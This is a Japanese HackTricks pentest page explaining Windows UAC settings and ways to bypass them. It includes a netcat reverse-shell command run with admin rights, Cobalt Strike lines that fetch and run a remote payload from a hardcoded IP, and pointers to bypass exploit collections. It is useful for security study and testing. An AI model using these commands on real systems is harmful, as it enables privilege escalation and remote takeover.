Japanese - Ht

UAC - User Account Control

HackTricksをサポートする

Trickestを使用して、世界で最も高度なコミュニティツールによって駆動されるワークフローを簡単に構築し、自動化します。 今すぐアクセスを取得:

UAC

ユーザーアカウント制御 (UAC)は、昇格された活動のための同意プロンプトを有効にする機能です。アプリケーションには異なるintegrityレベルがあり、高いレベルのプログラムは、システムを危険にさらす可能性のあるタスクを実行できます。UACが有効になっている場合、アプリケーションやタスクは常に非管理者アカウントのセキュリティコンテキストの下で実行され、管理者が明示的にこれらのアプリケーション/タスクに管理者レベルのアクセスを許可しない限り、システムを実行することはできません。これは、管理者が意図しない変更から保護される便利な機能ですが、セキュリティ境界とは見なされません。

インテグリティレベルに関する詳細情報:

Integrity Levels

UACが有効な場合、管理者ユーザーには2つのトークンが与えられます:通常のアクションを通常レベルで実行するための標準ユーザーキーと、管理者権限を持つものです。

このページでは、UACの動作について詳細に説明しており、ログオンプロセス、ユーザーエクスペリエンス、UACアーキテクチャが含まれています。管理者は、セキュリティポリシーを使用して、ローカルレベルで自組織に特有のUACの動作を構成することができ(secpol.mscを使用)、またはActive Directoryドメイン環境でグループポリシーオブジェクト(GPO)を介して構成して展開することができます。さまざまな設定については、こちらで詳しく説明されています。UACに設定できるグループポリシー設定は10個あります。以下の表は追加の詳細を提供します:

グループポリシー設定レジストリキーデフォルト設定

ユーザーアカウント制御:組み込みの管理者アカウントの管理者承認モード

FilterAdministratorToken

無効

ユーザーアカウント制御:UIAccessアプリケーションがセキュアデスクトップを使用せずに昇格を要求できるようにする

EnableUIADesktopToggle

無効

ユーザーアカウント制御:管理者の管理者承認モードにおける昇格プロンプトの動作

ConsentPromptBehaviorAdmin

非Windowsバイナリに対して同意を求めるプロンプト

ユーザーアカウント制御:標準ユーザーの昇格プロンプトの動作

ConsentPromptBehaviorUser

セキュアデスクトップでの資格情報を求めるプロンプト

ユーザーアカウント制御:アプリケーションのインストールを検出し、昇格を要求する

EnableInstallerDetection

有効(ホームのデフォルト)無効(エンタープライズのデフォルト)

ユーザーアカウント制御:署名され、検証された実行可能ファイルのみを昇格させる

ValidateAdminCodeSignatures

無効

ユーザーアカウント制御:セキュアな場所にインストールされたUIAccessアプリケーションのみを昇格させる

EnableSecureUIAPaths

有効

ユーザーアカウント制御:すべての管理者を管理者承認モードで実行する

EnableLUA

有効

ユーザーアカウント制御:昇格を要求する際にセキュアデスクトップに切り替える

PromptOnSecureDesktop

有効

ユーザーアカウント制御:ファイルおよびレジストリの書き込み失敗をユーザーごとの場所に仮想化する

EnableVirtualization

有効

UACバイパス理論

一部のプログラムは、ユーザーが 管理者グループに属している場合自動的に自動昇格されます。これらのバイナリには、_Manifests内にautoElevateオプションがTrue_の値で含まれています。バイナリは、Microsoftによって署名されている必要があります

次に、UACをバイパスするために(のインテグリティレベルからに昇格する)、一部の攻撃者はこの種のバイナリを使用して任意のコードを実行します。なぜなら、それは高いレベルのインテグリティプロセスから実行されるからです。

バイナリの_Manifestを確認するには、Sysinternalsのツールsigcheck.exe_を使用できます。また、_Process Explorer_または_SysinternalsのProcess Monitor_を使用してプロセスのインテグリティレベルを確認できます。

UACを確認する

UACが有効かどうかを確認するには、次の操作を行います:

REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
EnableLUA    REG_DWORD    0x1

もし**1であれば、UACは有効です。もし0であるか、存在しない場合は、UACは無効**です。

次に、どのレベルが設定されているかを確認します:

REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
ConsentPromptBehaviorAdmin    REG_DWORD    0x5

  • 0 の場合、UACはプロンプトを表示しません(無効のように)

  • 1 の場合、管理者はユーザー名とパスワードを求められ、高権限でバイナリを実行します(セキュアデスクトップ上で)

  • 2常に通知)の場合、UACは管理者が高権限で何かを実行しようとするたびに常に確認を求めます(セキュアデスクトップ上で)

  • 3 の場合、1のようですが、セキュアデスクトップ上で必要ではありません

  • 4 の場合、2のようですが、セキュアデスクトップ上で必要ではありません

  • 5デフォルト)の場合、管理者に高権限で非Windowsバイナリを実行するための確認を求めます

次に、LocalAccountTokenFilterPolicy の値を確認する必要があります。 値が 0 の場合、RID 500 ユーザー(組み込み管理者)のみがUACなしで管理タスクを実行でき、1 の場合は、「Administrators」 グループ内のすべてのアカウントがそれを実行できます。

最後に、キー FilterAdministratorToken の値を確認します。 0(デフォルト)の場合、組み込み管理者アカウントはリモート管理タスクを実行でき、1 の場合、組み込み管理者アカウントはリモート管理タスクを実行できませんが、LocalAccountTokenFilterPolicy1 に設定されている場合を除きます。

概要

  • EnableLUA=0 または 存在しない場合、誰に対してもUACなし

  • EnableLua=1 かつ LocalAccountTokenFilterPolicy=1 の場合、誰に対してもUACなし

  • EnableLua=1 かつ LocalAccountTokenFilterPolicy=0 かつ FilterAdministratorToken=0 の場合、RID 500(組み込み管理者)に対してUACなし

  • EnableLua=1 かつ LocalAccountTokenFilterPolicy=0 かつ FilterAdministratorToken=1 の場合、全員に対してUACあり

このすべての情報は、metasploit モジュール post/windows/gather/win_privs を使用して収集できます。

ユーザーのグループを確認し、整合性レベルを取得することもできます。

net user %username%
whoami /groups | findstr Level

UACバイパス

被害者にグラフィカルアクセスがある場合、UACバイパスは簡単です。UACプロンプトが表示されたときに「はい」をクリックするだけです。

UACバイパスが必要な状況は次のとおりです:UACが有効で、プロセスが中程度の整合性コンテキストで実行されており、ユーザーが管理者グループに属している場合

UACが最高のセキュリティレベル(常に)に設定されている場合、他のレベル(デフォルト)の場合よりもUACをバイパスするのははるかに難しいことを言及することが重要です。

UAC無効

UACがすでに無効になっている場合(ConsentPromptBehaviorAdminが**0)、次のようなもので管理者権限でリバースシェルを実行**できます(高整合性レベル)。

#Put your reverse shell instead of "calc.exe"
Start-Process powershell -Verb runAs "calc.exe"
Start-Process powershell -Verb runAs "C:\Windows\Temp\nc.exe -e powershell 10.10.14.7 4444"

UACバイパスとトークン複製

非常に 基本的なUAC "バイパス"(フルファイルシステムアクセス)

Administratorsグループに属するユーザーのシェルがあれば、**C$**共有をSMB(ファイルシステム)経由で新しいディスクにマウントすることができ、ファイルシステム内のすべてにアクセスできます(Administratorのホームフォルダも含む)。

このトリックはもう機能していないようです

net use Z: \\127.0.0.1\c$
cd C$

#Or you could just access it:
dir \\127.0.0.1\c$\Users\Administrator\Desktop

UACバイパスとCobalt Strike

Cobalt Strikeの技術は、UACが最大のセキュリティレベルに設定されていない場合にのみ機能します。

# UAC bypass via token duplication
elevate uac-token-duplication [listener_name]
# UAC bypass via service
elevate svc-exe [listener_name]

# Bypass UAC with Token Duplication
runasadmin uac-token-duplication powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
# Bypass UAC with CMSTPLUA COM interface
runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"

EmpireMetasploit には、UACバイパス するためのいくつかのモジュールがあります。

KRBUACBypass

ドキュメントとツールは https://github.com/wh0amitz/KRBUACBypass にあります。

UAC バイパスエクスプロイト

UACME は、いくつかの UAC バイパスエクスプロイトの コンパイル です。UACME を Visual Studio または msbuild を使用してコンパイルする必要があります。コンパイルにより、いくつかの実行可能ファイル(例: Source\Akagi\outout\x64\Debug\Akagi.exe)が作成されます。どれが必要かを知っておく必要があります。 注意が必要 です。なぜなら、いくつかのバイパスは 他のプログラムを促す ことがあり、ユーザー に何かが起こっていることを 警告 します。

UACME には、各技術が動作し始めた ビルドバージョン があります。あなたのバージョンに影響を与える技術を検索できます:

PS C:\> [environment]::OSVersion.Version

Major  Minor  Build  Revision
-----  -----  -----  --------
10     0      14393  0

また、このページを使用すると、ビルドバージョンからWindowsリリース1607を取得できます。

さらなるUACバイパス

ここで使用されるすべての技術は、AUCをバイパスするために 完全なインタラクティブシェル を必要とします(一般的なnc.exeシェルでは不十分です)。

meterpreterセッションを使用して取得できます。Session値が1に等しいプロセスに移行します:

(_explorer.exe_は動作するはずです)

GUIを使用したUACバイパス

GUIにアクセスできる場合、UACプロンプトが表示されたときにそれを受け入れるだけで済みます。 実際にはバイパスは必要ありません。したがって、GUIにアクセスすることでUACをバイパスできます。

さらに、誰かが使用していたGUIセッション(おそらくRDP経由)を取得した場合、管理者として実行されるいくつかのツールがあり、そこから管理者として直接cmd実行できる可能性があります。UACによって再度プロンプトが表示されることはありません。たとえば、https://github.com/oski02/UAC-GUI-Bypass-appverif。これは少しステルスかもしれません。

騒がしいブルートフォースUACバイパス

騒がしいことを気にしない場合は、常にhttps://github.com/Chainski/ForceAdminのようなものを実行して、ユーザーが受け入れるまで権限を昇格させるように要求することができます。

自分自身のバイパス - 基本的なUACバイパス手法

UACMEを見てみると、ほとんどのUACバイパスはDLLハイジャックの脆弱性を悪用しています(主に悪意のあるdllを_C:\Windows\System32_に書き込むこと)。DLLハイジャックの脆弱性を見つける方法を学ぶには、これをお読みください

  1. 自動昇格するバイナリを見つけます(実行時に高い整合性レベルで実行されることを確認します)。

  2. procmonを使用して、DLLハイジャックに脆弱な**"NAME NOT FOUND"**イベントを見つけます。

  3. 書き込み権限がない保護されたパス(C:\Windows\System32など)内にDLLを書き込む必要があるかもしれません。これをバイパスするには:

    1. wusa.exe:Windows 7、8、8.1。CABファイルの内容を保護されたパス内に抽出することができます(このツールは高い整合性レベルから実行されるため)。

    2. IFileOperation:Windows 10。

  4. 保護されたパス内にDLLをコピーし、脆弱で自動昇格されたバイナリを実行するためのスクリプトを準備します。

別のUACバイパス技術

自動昇格バイナリ実行されるためのバイナリまたはコマンド名前/パスレジストリから読み取ろうとするのを監視することに基づいています(このバイナリがHKCU内でこの情報を検索する場合、より興味深いです)。

Trickestを使用して、世界で最も高度なコミュニティツールによって強化されたワークフローを簡単に構築および自動化します。 今すぐアクセスを取得:

HackTricksをサポートする
PreviousWindows Security ControlsNextNTLM

Last updated